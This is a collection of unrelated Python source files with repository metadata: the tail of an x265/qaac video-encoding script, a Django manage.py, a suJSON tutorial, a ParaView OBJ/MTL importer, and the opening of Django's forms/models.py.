    whole_hours, remainder = divmod(secs, 3600)
    whole_minutes, leftover_secs = divmod(remainder, 60)
    return "%02d:%02d:%05.4f" % (whole_hours, whole_minutes, leftover_secs)
def do_encode(clip: vs.VideoNode)-> None:
    """Compression with x26X

    Encodes the filtered clip with x265, extracts/encodes the BD audio,
    writes an encoder tag file, muxes everything into the final .mkv,
    then removes intermediate files. Each stage is skipped if its output
    already exists on disk.
    """
    # --- Video: pipe the clip as y4m into x265 ---
    if not os.path.isfile(JPBD.output):
        print('\n\n\nVideo encoding')
        bits = clip.format.bits_per_sample
        x265_cmd = f'x265 -o {JPBD.output} - --y4m' + ' '
        x265_cmd += f'--csv {JPBD.name}_log_x265.csv --csv-log-level 2' + ' '
        x265_cmd += '--frame-threads 8 --pmode --pme --preset slower' + ' '
        x265_cmd += f'--frames {clip.num_frames} --fps {clip.fps_num}/{clip.fps_den} --output-depth {bits}' + ' '
        x265_cmd += '--rd 3 --no-rect --no-amp --rskip 1 --tu-intra-depth 2 --tu-inter-depth 2 --tskip' + ' '
        x265_cmd += '--merange 48 --weightb' + ' '
        x265_cmd += '--no-strong-intra-smoothing' + ' '
        x265_cmd += '--psy-rd 2.0 --psy-rdoq 1.0 --no-open-gop --keyint 360 --min-keyint 12 --scenecut 45 --rc-lookahead 120 --bframes 16' + ' '
        x265_cmd += '--crf 15 --aq-mode 3 --aq-strength 1.0 --qcomp 0.70' + ' '
        x265_cmd += '--deblock=-1:-1 --no-sao --no-sao-non-deblock' + ' '
        # Limited-range BT.709 signalling; luma bounds scale with bit depth.
        x265_cmd += f'--sar 1 --range limited --colorprim 1 --transfer 1 --colormatrix 1 --min-luma {str(16<<(bits - 8))} --max-luma {str(235<<(bits - 8))}'# + ' '

        print("Encoder command: ", " ".join(shlex.split(x265_cmd)), "\n")
        process = subprocess.Popen(shlex.split(x265_cmd), stdin=subprocess.PIPE)
        clip.output(process.stdin, y4m=True, progress_update=lambda value, endvalue:
                    print(f"\rVapourSynth: {value}/{endvalue} ~ {100 * value // endvalue}% || Encoder: ", end=""))
        process.communicate()

    # --- Audio extraction from the BD with eac3to ---
    if not os.path.isfile(JPBD.a_src.format(1)):
        print('\n\n\nAudio extraction')
        eac3to_args = ['eac3to', JPBD.src,
                       '2:', JPBD.a_src.format(1),
                       # '3:', JPBD.a_src.format(2),
                       '-log=NUL']
        subprocess.run(eac3to_args, text=True, check=True, encoding='utf-8')

    # --- Audio encoding with qaac; trim via --start/--end timestamps ---
    if not os.path.isfile(JPBD.a_enc_cut.format(1)):
        print('\n\n\nAudio encoding')
        qaac_args = ['--no-delay', '--no-optimize', '--threading',
                     '--start', sec_to_time(JPBD.frame_start / (clip.fps_num/clip.fps_den)),
                     '--end', sec_to_time((JPBD.src_clip.num_frames + JPBD.frame_end) / (clip.fps_num/clip.fps_den))]
        qaac_args_more = ['qaac', JPBD.a_src.format(1), '-V', '127', *qaac_args, '-o', JPBD.a_enc_cut.format(1)]
        subprocess.run(qaac_args_more, text=True, check=True, encoding='utf-8')
        # qaac_args_more = ['qaac', JPBD.a_src.format(2), '-V', '127', *qaac_args, '-o', JPBD.a_enc_cut.format(2)]
        # subprocess.run(qaac_args_more, text=True, check=True, encoding='utf-8')

    # --- Tag file with the audio encoder name (read back by mkvmerge) ---
    # NOTE(review): the existence check looks at 'tags_aac_1.xml' but the file
    # written below is 'tags_aac.xml' — the tag file is therefore regenerated
    # on every run. TODO confirm which name was intended.
    if not os.path.isfile('tags_aac_1.xml'):
        ffprobe_args = ['ffprobe', '-loglevel', 'quiet', '-show_entries', 'format_tags=encoder', '-print_format', 'default=nokey=1:noprint_wrappers=1', JPBD.a_enc_cut.format(1)]
        encoder_name = subprocess.check_output(ffprobe_args, shell=True, encoding='utf-8')
        f = open("tags_aac.xml", 'w')
        f.writelines(['<?xml version="1.0"?>', '<Tags>', '<Tag>', '<Targets>', '</Targets>',
                      '<Simple>', '<Name>ENCODER</Name>', f'<String>{encoder_name}</String>', '</Simple>',
                      '</Tag>', '</Tags>'])
        f.close()

    # --- Final mux: video + audio + chapters into the .mkv ---
    if not os.path.isfile(JPBD.output_final):
        print('\nFinal muxing')
        mkv_args = ['mkvmerge', '-o', JPBD.output_final,
                    '--track-name', '0:HEVC BDRip by Vardë@Raws-Maji', '--language', '0:jpn', JPBD.output,
                    '--tags', '0:tags_aac.xml', '--track-name', '0:AAC 2.0', '--language', '0:jpn', JPBD.a_enc_cut.format(1),
                    # '--tags', '0:tags_aac.xml', '--track-name', '0:AAC 2.0 Commentary', '--language', '0:jpn', JPBD.a_enc_cut.format(2),
                    '--chapter-language', 'jpn', '--chapters', JPBD.chapter]
        subprocess.run(mkv_args, text=True, check=True, encoding='utf-8')

    # Clean up
    files = [JPBD.a_src.format(1), JPBD.a_src.format(2),
             JPBD.a_enc_cut.format(1), JPBD.a_enc_cut.format(2), 'tags_aac.xml']
    for file in files:
        if os.path.exists(file):
            os.remove(file)
# Entry point: filter the source, then run the full encode/mux pipeline.
if __name__ == '__main__':
    FILTERED = do_filter()
    do_encode(FILTERED)
| 40.228261 | 177 | 0.614564 |
acfa99ba02ade6e6a67ed3c170a3805697dcabe9 | 552 | py | Python | manage.py | titans55/pizza-ordering-service | 9e2fbf1347fa1cdf908362cfa1fd51ebb9557fee | [
"MIT"
] | 1 | 2019-11-13T12:09:33.000Z | 2019-11-13T12:09:33.000Z | manage.py | titans55/pizza-ordering-service | 9e2fbf1347fa1cdf908362cfa1fd51ebb9557fee | [
"MIT"
] | null | null | null | manage.py | titans55/pizza-ordering-service | 9e2fbf1347fa1cdf908362cfa1fd51ebb9557fee | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
    # Point Django at this project's settings before importing anything from it.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'PizzaOrderingService.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
| 34.5 | 84 | 0.693841 |
acfa9adaea9c69b41b3a997e15132413de0a7e91 | 2,282 | py | Python | example/tutorial.py | PotasnikM/translator-to-suJSON | abb2001c78d431bd2087754666bc896ba0543dfd | [
"MIT"
] | 2 | 2019-07-01T12:45:25.000Z | 2020-06-23T11:48:08.000Z | example/tutorial.py | PotasnikM/translator-to-suJSON | abb2001c78d431bd2087754666bc896ba0543dfd | [
"MIT"
] | 17 | 2019-04-25T10:46:40.000Z | 2020-11-10T09:28:55.000Z | example/tutorial.py | PotasnikM/translator-to-suJSON | abb2001c78d431bd2087754666bc896ba0543dfd | [
"MIT"
] | 3 | 2019-06-22T19:51:08.000Z | 2021-02-08T09:17:55.000Z | from sujson._sujson import Sujson
import subprocess
from subprocess import PIPE
from pathlib import Path

# Load an existing suJSON file and explore its scores with pandas.
sujson = Sujson()
sujson_file = str(Path('example', 'hdtv5.json'))
sujson._read_sujson(sujson_file)
df = sujson.pandas_export()
print(df)
# mean
print(df.groupby('stimulus_id')['score'].mean())
# standard deviation
print(df.groupby('stimulus_id')['score'].std())

# translating .xls file to suJSON
xls_file = str(Path('example', 'data', 'VQEG_HDTV_Final_Report_Data.xls'))
config = str(Path('example', 'config', 'config_for_hdtv.json'))
sujson_from_xls = str(Path('example', 'xls_output.json'))
command = 'python -m sujson ingest {} {} -o {}'.format(xls_file, config, sujson_from_xls)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# translating .xls file to suJSON without output file - printing to console
command = 'python -m sujson ingest {} {}'.format(xls_file, config)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()

# translating .csv file to suJSON
csv_file = str(Path('example', 'data', 'subjective_quality_datasets.csv'))
config = str(Path('example', 'config', 'config_for_hdtv_csv.json'))
sujson_from_csv = str(Path('example', 'csv_output.json'))
command = 'python -m sujson ingest {} {} -o {}'.format(csv_file, config, sujson_from_csv)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# translating .csv file to suJSON without output file - printing to console
command = 'python -m sujson ingest {} {}'.format(csv_file, config)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()

# suJSON to pandas dataframe (.csv)
output_csv = str(Path('example', 'output_pandas.csv'))
export_format = 'Pandas'
command = 'python -m sujson export {} -o {} -f {}'.format(sujson_from_csv, output_csv, export_format)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# suJSON to .pickle file
output_pickle = str(Path('example', 'output_pickle.pickle'))
export_format = 'suJSON'
command = 'python -m sujson export {} -o {} -f {}'.format(sujson_from_csv, output_pickle, export_format)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
| 34.575758 | 104 | 0.737949 |
acfa9b4e71de5cf393efebbc92f57312f71782e7 | 13,911 | py | Python | Utilities/ParaView/obj-mtl-importer.py | jmargeta/vtk-js | 78bb2f1729a4104df7ff6a80a19fe18579db9119 | [
"BSD-3-Clause"
] | null | null | null | Utilities/ParaView/obj-mtl-importer.py | jmargeta/vtk-js | 78bb2f1729a4104df7ff6a80a19fe18579db9119 | [
"BSD-3-Clause"
] | 1 | 2022-03-02T05:53:14.000Z | 2022-03-02T05:53:14.000Z | Utilities/ParaView/obj-mtl-importer.py | jmargeta/vtk-js | 78bb2f1729a4104df7ff6a80a19fe18579db9119 | [
"BSD-3-Clause"
] | 1 | 2020-06-19T08:21:54.000Z | 2020-06-19T08:21:54.000Z | #!/Applications/ParaView-5.4.0.app/Contents/bin/pvpython
# -----------------------------------------------------------------------------
# User configuration
# -----------------------------------------------------------------------------
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/ferrari-f1-race-car/ferrari-f1-race-car.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/ferrari-f1-race-car/ferrari-f1-race-car.mtl'
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/blskes-plane/blskes-plane.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/blskes-plane/blskes-plane.mtl'
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/mini-cooper/mini-cooper.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/mini-cooper/mini-cooper.mtl'
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/space-shuttle-orbiter/space-shuttle-orbiter.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/space-shuttle-orbiter/space-shuttle-orbiter.mtl'
# -----------------------------------------------------------------------------
from vtk import *
from paraview import simple
import os
import sys
import hashlib
import json
# -----------------------------------------------------------------------------
# obj Parser
# -----------------------------------------------------------------------------
class OBJParser(object):
    """Stream a Wavefront .obj file into one or more vtkPolyData objects.

    When *splitMode* names a keyword (e.g. ``'usemtl'``), the faces are split
    into one piece per occurrence of that keyword; otherwise a single
    polydata is produced.

    NOTE(review): this script targets the Python 2 interpreter shipped with
    ParaView (pvpython) — several ``/`` divisions below rely on integer
    division and would yield floats under Python 3.
    """

    def __init__(self, objFilePath, splitMode = None):
        self.splitOn = splitMode
        self.pieces = [];       # piece names, one per splitOn occurrence
        self.v = [];            # flat vertex coordinates (x, y, z, ...)
        self.vt = [];           # flat texture coordinates (u, v, ...)
        self.vn = [];           # flat vertex normals (x, y, z, ...)
        self.f = [[]];          # per-piece face lists: [size, [v, vt, vn], ...]
        self.size = 0;          # number of pieces seen so far
        self.output = []        # resulting vtkPolyData objects
        with open(objFilePath, "r") as objLines:
            for line in objLines:
                self.parseLine(line.rstrip('\n'))
        self.end();

    @staticmethod
    def createPoints(pythonArray):
        """Build a vtkPoints from a flat [x, y, z, ...] list."""
        pts = vtkPoints()
        nbPoints = len(pythonArray) / 3
        pts.SetNumberOfPoints(nbPoints);
        for i in range(nbPoints):
            pts.SetPoint(i, pythonArray[(i * 3) + 0], pythonArray[(i * 3) + 1], pythonArray[(i * 3) + 2])
        return pts

    @staticmethod
    def createCellArray(pythonArray, nbCells):
        """Build a vtkCellArray from a flat [size, id, id, ..., size, ...] list."""
        cellArray = vtkCellArray()
        cellArray.SetNumberOfCells(nbCells)
        idArray = cellArray.GetData()
        idArray.SetNumberOfTuples(len(pythonArray))
        for i in range(len(pythonArray)):
            idArray.SetValue(i, pythonArray[i])
        return cellArray

    @staticmethod
    def createFloatArray(name, nbComponents, pythonArray):
        """Build a named vtkFloatArray with *nbComponents* per tuple."""
        array = vtkFloatArray()
        array.SetName(name)
        array.SetNumberOfComponents(nbComponents)
        array.SetNumberOfTuples(len(pythonArray) / nbComponents)
        for i in range(len(pythonArray)):
            array.SetValue(i, pythonArray[i])
        return array

    @staticmethod
    def pushVector(src, srcOffset, dst, vectorSize):
        """Append *vectorSize* consecutive values from src[srcOffset:] to dst."""
        for i in range(vectorSize):
            dst.append(src[srcOffset + i])

    @staticmethod
    def faceMap(str):
        # NOTE(review): parameter shadows the builtin `str`; kept as-is here.
        # Parses one "v/vt/vn" face token; OBJ indices are 1-based, hence -1.
        # Missing vt/vn components fall back to the vertex index.
        idxs = [int(i) if len(i) else 1 for i in str.split('/')]
        vertexIdx = int(idxs[0] - 1);
        textCoordIdx = int(idxs[1] - 1) if len(idxs) > 1 else vertexIdx
        vertexNormal = int(idxs[2] - 1) if len(idxs) > 2 else vertexIdx
        return [vertexIdx, textCoordIdx, vertexNormal]

    def parseLine(self, line):
        """Dispatch one .obj line (v / vt / vn / f / split keyword)."""
        if len(line.strip()) == 0 or line[0] == '#':
            return
        tokens = line.strip().split()
        if tokens[0] == self.splitOn:
            # Start a new piece named after the rest of the line.
            tokens.pop(0)
            self.pieces.append(' '.join(tokens).strip())
            self.f.append([])
            self.size += 1;
        elif tokens[0] == 'v':
            self.v.append(float(tokens[1]))
            self.v.append(float(tokens[2]))
            self.v.append(float(tokens[3]))
        elif tokens[0] == 'vt':
            self.vt.append(float(tokens[1]))
            self.vt.append(float(tokens[2]))
        elif tokens[0] == 'vn':
            self.vn.append(float(tokens[1]))
            self.vn.append(float(tokens[2]))
            self.vn.append(float(tokens[3]))
        elif tokens[0] == 'f':
            # Handle triangles for now
            if self.size == 0:
                self.size += 1
            cells = self.f[self.size - 1];
            tokens.pop(0)
            size = len(tokens)
            cells.append(size)
            for i in range(size):
                cells.append(OBJParser.faceMap(tokens[i]))

    def end(self):
        """Convert the accumulated arrays into vtkPolyData object(s)."""
        hasTcoords = True if len(self.vt) > 0 else False
        hasNormals = True if len(self.vn) > 0 else False
        if self.splitOn:
            # One polydata per piece; points are re-indexed per piece so that
            # each unique v/vt/vn triple becomes one point (ctMapping cache).
            for idx in range(self.size):
                ctMapping = {}
                polydata = vtkPolyData()
                pts = []
                tc = []
                normals = []
                polys = []
                nbCells = 0
                polyIn = self.f[idx]
                nbElems = len(polyIn)
                offset = 0
                while offset < nbElems:
                    cellSize = polyIn[offset]
                    nbCells += 1
                    polys.append(cellSize)
                    for pIdx in range(cellSize):
                        vIdx, tcIdx, nIdx = polyIn[offset + pIdx + 1]
                        key = '%d/%d/%d' % (vIdx, tcIdx, nIdx)
                        if key not in ctMapping:
                            # New unique triple: copy its vertex/tcoord/normal.
                            ctMapping[key] = len(pts) / 3
                            OBJParser.pushVector(self.v, vIdx * 3, pts, 3)
                            if hasTcoords:
                                OBJParser.pushVector(self.vt, tcIdx * 2, tc, 2)
                            if hasNormals:
                                OBJParser.pushVector(self.vn, nIdx * 3, normals, 3)
                        polys.append(ctMapping[key])
                    offset += cellSize + 1;
                polydata.SetPoints(OBJParser.createPoints(pts))
                polydata.SetPolys(OBJParser.createCellArray(polys, nbCells))
                if hasTcoords:
                    tcoords = OBJParser.createFloatArray('TextureCoordinates', 2, tc)
                    polydata.GetPointData().SetTCoords(tcoords);
                if hasNormals:
                    normalsArray = OBJParser.createFloatArray('Normals', 3, normals)
                    polydata.GetPointData().SetNormals(normalsArray)
                # register in output
                self.output.append(polydata)
                print(self.pieces[idx])
        else:
            # Single polydata: reuse the global arrays directly; tcoords and
            # normals are attached only when their counts match the points.
            polydata = vtkPolyData()
            polydata.SetPoints(OBJParser.createPoints(self.v))
            if hasTcoords and (len(self.v) / 3) == (len(self.vt) / 2):
                tcoords = OBJParser.createFloatArray('TextureCoordinates', 2, self.vt)
                polydata.GetPointData().SetTCoords(tcoords);
            if hasNormals and (len(self.v) == len(self.vn)):
                normalsArray = OBJParser.createFloatArray('Normals', 3, self.vn)
                polydata.GetPointData().SetNormals(normalsArray)
            polys = []
            polyIn = self.f[0]
            nbElems = len(polyIn)
            offset = 0
            nbCells = 0
            while offset < nbElems:
                cellSize = polyIn[offset]
                nbCells += 1
                polys.append(cellSize)
                for pIdx in range(cellSize):
                    polys.append(polyIn[offset + pIdx + 1][0])
                offset += cellSize + 1
            polydata.SetPolys(OBJParser.createCellArray(polys, nbCells))
            self.output.append(polydata)
# -----------------------------------------------------------------------------
# mtl Parser
# -----------------------------------------------------------------------------
def materialToSHA(mat):
    """Return a stable MD5 fingerprint of one material definition.

    Keys are hashed in sorted order so that identical materials always map
    to the same digest, letting callers collapse duplicates.
    """
    # sorted() instead of mat.keys().sort(): dict views have no .sort() under
    # Python 3, while the result is identical under Python 2.
    m = hashlib.md5()
    for key in sorted(mat.keys()):
        m.update(key)
        for token in mat[key]:
            m.update(token)
    return m.hexdigest()
class MTLParser(object):
    """Parse a Wavefront .mtl file and apply its materials to ParaView
    representations (color, opacity, specular, texture)."""

    def __init__(self, mtlFilePath):
        self.materials = {}                   # material name -> {token: values}
        self.currentMaterial = None           # name of material being parsed
        self.textures = {}                    # material name -> texture proxy
        self.baseDir = os.path.dirname(mtlFilePath)   # for relative texture paths
        self.reducedMaterialMap = {}          # name -> digest (duplicates collapse)
        self.reverseReduceMap = {}            # digest -> one representative name
        self.representationsParameters = {}   # applied params, dumped to JSON later
        with open(mtlFilePath, "r") as lines:
            for line in lines:
                self.parseLine(line.rstrip('\n'))

    def parseLine(self, line):
        """Record one .mtl line under the current material."""
        if len(line.strip()) == 0 or line[0] == '#':
            return
        tokens = line.strip().split()
        if tokens[0] == 'newmtl':
            tokens.pop(0);
            self.currentMaterial = ' '.join(tokens).strip()
        elif self.currentMaterial:
            if self.currentMaterial not in self.materials:
                self.materials[self.currentMaterial] = {}
            if len(tokens) > 1:
                self.materials[self.currentMaterial][tokens[0]] = tokens[1:]

    def reduceMaterialDefinitions(self):
        """Fingerprint every material so identical definitions share one key."""
        for name in self.materials:
            sha = materialToSHA(self.materials[name])
            self.reducedMaterialMap[name] = sha
            self.reverseReduceMap[sha] = name
        print('Reducing materials from %s to %s' % (len(self.reducedMaterialMap), len(self.reverseReduceMap)))

    def applyMaterialToRepresentation(self, name, representation):
        """Apply the material called *name* (or its digest) to a ParaView
        representation, recording each applied parameter."""
        self.representationsParameters[name] = {}
        material = {}
        if name in self.materials:
            material = self.materials[name]
        # *name* may be a digest produced by reduceMaterialDefinitions.
        if name in self.reverseReduceMap:
            material = self.materials[self.reverseReduceMap[name]]
        if 'map_Kd' in material:
            # Diffuse texture: create the proxy once per name, then reuse it.
            if name not in self.textures:
                from paraview import servermanager
                texture = servermanager._getPyProxy(servermanager.CreateProxy('textures', 'ImageTexture'))
                texture.FileName = os.path.join(self.baseDir, material['map_Kd'][0])
                self.textures[name] = texture
                servermanager.Register(texture)
            representation.Texture = self.textures[name]
        if 'Ka' in material:
            representation.AmbientColor = [float(n) for n in material['Ka']]
            self.representationsParameters[name]['AmbientColor'] = [float(n) for n in material['Ka']]
        if 'Ks' in material:
            representation.SpecularColor = [float(v) for v in material['Ks']]
            self.representationsParameters[name]['SpecularColor'] = [float(v) for v in material['Ks']]
        if 'Kd' in material:
            representation.DiffuseColor = [float(v) for v in material['Kd']]
            self.representationsParameters[name]['DiffuseColor'] = [float(v) for v in material['Kd']]
        if 'd' in material:
            representation.Opacity = float(material['d'][0])
            self.representationsParameters[name]['Opacity'] = float(material['d'][0])
        if 'Ns' in material:
            representation.SpecularPower = float(material['Ns'][0])
            self.representationsParameters[name]['SpecularPower'] = float(material['Ns'][0])
        if 'illum' in material:
            # illum level enables ambient (>=0), diffuse (>=1), specular (>=2).
            representation.Ambient = 1.0 if 0 <= float(material['illum'][0]) else 0.0
            representation.Diffuse = 1.0 if 1 <= float(material['illum'][0]) else 0.0
            representation.Specular = 1.0 if 2 <= float(material['illum'][0]) else 0.0
            self.representationsParameters[name]['Ambient'] = 1.0 if 0 <= float(material['illum'][0]) else 0.0
            self.representationsParameters[name]['Diffuse'] = 1.0 if 1 <= float(material['illum'][0]) else 0.0
            self.representationsParameters[name]['Specular'] = 1.0 if 2 <= float(material['illum'][0]) else 0.0
        # else:
        #     representation.Ambient = 1.0
        #     representation.Diffuse = 1.0
        #     representation.Specular = 1.0
# -----------------------------------------------------------------------------
# Mesh writer builder
# -----------------------------------------------------------------------------
def writeMeshes(meshBaseDirectory, objReader, nameMapping=None):
    """Merge the parser's pieces by mapped name and write one .vtp per group.

    Returns a dict mapping each group name to the file path written.
    `nameMapping` (piece name -> group key) defaults to the identity mapping.
    """
    # Fix: the original used a mutable default (`nameMapping={}`) and then
    # mutated it below, leaking identity entries across calls. A None default
    # keeps the explicit-argument behavior (caller's dict is still updated).
    nameToFilePath = {}
    writer = vtkXMLPolyDataWriter()
    ext = '.vtp'
    if not os.path.exists(meshBaseDirectory):
        os.makedirs(meshBaseDirectory)

    nbPieces = len(objReader.pieces)
    dsList = {}
    nameToKey = {} if nameMapping is None else nameMapping
    # Default any unmapped piece to its own name.
    for idx in range(nbPieces):
        name = objReader.pieces[idx]
        if name not in nameToKey:
            nameToKey[name] = name

    # Gather polydata with same textures
    for idx in range(nbPieces):
        name = objReader.pieces[idx]
        key = nameToKey[name]
        if key not in dsList:
            dsList[key] = []
        dsList[key].append(objReader.output[idx])

    # Write each dataset
    idx = 0
    size = len(dsList)
    for name in dsList:
        fullPath = os.path.join(meshBaseDirectory, '%s%s' % (name, ext))
        merge = vtkAppendPolyData()
        for block in dsList[name]:
            merge.AddInputData(block)
        merge.Update()
        writer.SetInputData(merge.GetOutput(0))
        writer.SetFileName(fullPath)
        writer.Modified()
        print('%d - %d/%d - %s => %s' % ((idx + 1), len(dsList[name]), size, name, fullPath))
        writer.Write()
        nameToFilePath[name] = fullPath
        idx += 1

    return nameToFilePath
# -----------------------------------------------------------------------------
# Scene Loader
# -----------------------------------------------------------------------------
def loadScene(objFilePath, mtlFilePath):
    """Parse an .obj/.mtl pair, write per-material .vtp meshes next to the
    .obj, load each mesh into ParaView with its material applied, and dump
    the applied parameters to representations.json."""
    mtlReader = MTLParser(mtlFilePath)
    mtlReader.reduceMaterialDefinitions()
    # Split faces on 'usemtl' so each piece carries a single material.
    objReader = OBJParser(objFilePath, 'usemtl')
    meshBaseDirectory = os.path.join(os.path.dirname(objFilePath), os.path.basename(objFilePath)[:-4])
    meshMapping = writeMeshes(meshBaseDirectory, objReader, mtlReader.reducedMaterialMap)
    for name in meshMapping:
        source = simple.OpenDataFile(meshMapping[name], guiName=name)
        rep = simple.Show(source)
        mtlReader.applyMaterialToRepresentation(name, rep)
    with open('%s/representations.json' % meshBaseDirectory, "w") as text_file:
        text_file.write(json.dumps(mtlReader.representationsParameters, indent=2, sort_keys=True))
    simple.Render()
# -----------------------------------------------------------------------------
# Main
# -----------------------------------------------------------------------------
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: obj-mtl-importer /path/to/file.obj")
    else:
        # The .mtl is assumed to sit next to the .obj with the same stem.
        objPath = sys.argv[1]
        loadScene(objPath, '%s.mtl' % objPath[:-4])
        simple.SaveState('%s-pv-state.pvsm' % objPath[:-4])
| 34.7775 | 109 | 0.568543 |
acfa9c16078ed808faddfad76bc1c8818e52a11c | 1,150 | py | Python | src/recursions/010_recursion_braces.py | Ataago/Data-Structures-Algorithms | f85a5e4099a0b2c6a93a9bdcdd0245540fd41457 | [
"MIT"
] | null | null | null | src/recursions/010_recursion_braces.py | Ataago/Data-Structures-Algorithms | f85a5e4099a0b2c6a93a9bdcdd0245540fd41457 | [
"MIT"
] | null | null | null | src/recursions/010_recursion_braces.py | Ataago/Data-Structures-Algorithms | f85a5e4099a0b2c6a93a9bdcdd0245540fd41457 | [
"MIT"
] | 1 | 2021-06-07T12:49:14.000Z | 2021-06-07T12:49:14.000Z | # !/usr/bin/env python3
# encoding: utf-8
"""
Find all the well-formed combinations of N {}.
@author: Mohammed Ataaur Rahaman
"""
def permutations0(open_braces, close_braces, permutation):
    """Print every well-formed combination of braces, one per line.

    ``open_braces``/``close_braces`` count how many of each are still
    available; ``permutation`` is the prefix built so far.
    """
    if open_braces == 0 and close_braces == 0:
        # Every brace has been placed: emit the finished combination.
        print(permutation)
        return
    if open_braces > 0:
        permutations0(open_braces - 1, close_braces, permutation + "{")
    # A closing brace is legal only while more closers than openers remain.
    if open_braces < close_braces:
        permutations0(open_braces, close_braces - 1, permutation + "}")
def permutations1(open_braces, close_braces, permutation):
    """Return a list of every well-formed combination of braces.

    Same recursion as ``permutations0`` but collects the results instead
    of printing them.
    """
    if open_braces == 0 and close_braces == 0:
        return [permutation]
    results = []
    if open_braces > 0:
        results.extend(
            permutations1(open_braces - 1, close_braces, permutation + "{")
        )
    # A closing brace is legal only while more closers than openers remain.
    if open_braces < close_braces:
        results.extend(
            permutations1(open_braces, close_braces - 1, permutation + "}")
        )
    return results
if __name__ == '__main__':
    # N pairs of braces: N openers and N closers per combination.
    n = int(input(f'Enter N: '))
    open_braces = close_braces = n
    # First variant prints each combination; second returns them as a list.
    permutations0(open_braces, close_braces, '')
    perm = permutations1(open_braces, close_braces, '')
    print(perm)
| 27.380952 | 87 | 0.688696 |
acfa9cbb00af08454225f7c20329f7aa621f2745 | 436 | py | Python | initial-frames/viewTrial.py | kasmith/cbmm-project-christmas | 2543eaf9ab57f31d68fef8a9f5d629ce0116ca1a | [
"MIT"
] | null | null | null | initial-frames/viewTrial.py | kasmith/cbmm-project-christmas | 2543eaf9ab57f31d68fef8a9f5d629ce0116ca1a | [
"MIT"
] | null | null | null | initial-frames/viewTrial.py | kasmith/cbmm-project-christmas | 2543eaf9ab57f31d68fef8a9f5d629ce0116ca1a | [
"MIT"
] | null | null | null | from __future__ import division
from physicsTable import *
from physicsTable.constants import *
import pygame as pg
from pygame.constants import *
import sys
if __name__ == '__main__':
    # Expect the path to a trial file as the first CLI argument.
    if len(sys.argv) < 2:
        raise Exception('Need to load a trial from file path')
    tr = loadTrial(sys.argv[1])
    pg.init()
    # Fixed-size window; presumably sized to the trial's table -- TODO confirm.
    sc = pg.display.set_mode((1000,620))
    tb = tr.makeTable()
    tb.demonstrate()
acfa9cec3e68ce0d6e58d2daed7670183dee3718 | 28,578 | py | Python | app/django/forms/models.py | jamslevy/gsoc | e995e1a8d34e0291ab988ba501ae4efc61f9516d | [
"Apache-2.0"
] | 1 | 2016-05-09T14:43:53.000Z | 2016-05-09T14:43:53.000Z | app/django/forms/models.py | jamslevy/gsoc | e995e1a8d34e0291ab988ba501ae4efc61f9516d | [
"Apache-2.0"
] | null | null | null | app/django/forms/models.py | jamslevy/gsoc | e995e1a8d34e0291ab988ba501ae4efc61f9516d | [
"Apache-2.0"
] | null | null | null | """
Helper functions for creating Form classes from Django models
and database field objects.
"""
from django.utils.encoding import smart_unicode
from django.utils.datastructures import SortedDict
from django.utils.text import get_text_list, capfirst
from django.utils.translation import ugettext_lazy as _
from util import ValidationError, ErrorList
from forms import BaseForm, get_declared_fields
from fields import Field, ChoiceField, IntegerField, EMPTY_VALUES
from widgets import Select, SelectMultiple, HiddenInput, MultipleHiddenInput
from widgets import media_property
from formsets import BaseFormSet, formset_factory, DELETION_FIELD_NAME
try:
set
except NameError:
from sets import Set as set # Python 2.3 fallback
# Public API of this module.
__all__ = (
    'ModelForm', 'BaseModelForm', 'model_to_dict', 'fields_for_model',
    'save_instance', 'form_for_fields', 'ModelChoiceField',
    'ModelMultipleChoiceField',
)
def save_instance(form, instance, fields=None, fail_message='saved',
        commit=True, exclude=None):
    """
    Saves bound Form ``form``'s cleaned_data into model instance ``instance``.

    If commit=True, then the changes to ``instance`` will be saved to the
    database. Returns ``instance``.

    ``fields`` restricts the save to the named fields; ``exclude`` skips the
    named fields. ``fail_message`` is interpolated into the ValueError raised
    when the form has validation errors.
    """
    from django.db import models
    opts = instance._meta
    if form.errors:
        raise ValueError("The %s could not be %s because the data didn't"
                         " validate." % (opts.object_name, fail_message))
    cleaned_data = form.cleaned_data
    # Copy each editable, non-auto field value from cleaned_data onto the
    # instance, honoring the fields/exclude restrictions.
    for f in opts.fields:
        if not f.editable or isinstance(f, models.AutoField) \
                or not f.name in cleaned_data:
            continue
        if fields and f.name not in fields:
            continue
        if exclude and f.name in exclude:
            continue
        f.save_form_data(instance, cleaned_data[f.name])
    # Wrap up the saving of m2m data as a function.
    def save_m2m():
        # M2M rows need the instance's pk, so this runs only after save().
        opts = instance._meta
        cleaned_data = form.cleaned_data
        for f in opts.many_to_many:
            if fields and f.name not in fields:
                continue
            if f.name in cleaned_data:
                f.save_form_data(instance, cleaned_data[f.name])
    if commit:
        # If we are committing, save the instance and the m2m data immediately.
        instance.save()
        save_m2m()
    else:
        # We're not committing. Add a method to the form to allow deferred
        # saving of m2m data.
        form.save_m2m = save_m2m
    return instance
def make_model_save(model, fields, fail_message):
    """Build a ``save(commit=True)`` method that persists a *new* ``model``.

    The generated method instantiates a fresh ``model()`` and delegates
    the actual write to ``save_instance``.
    """
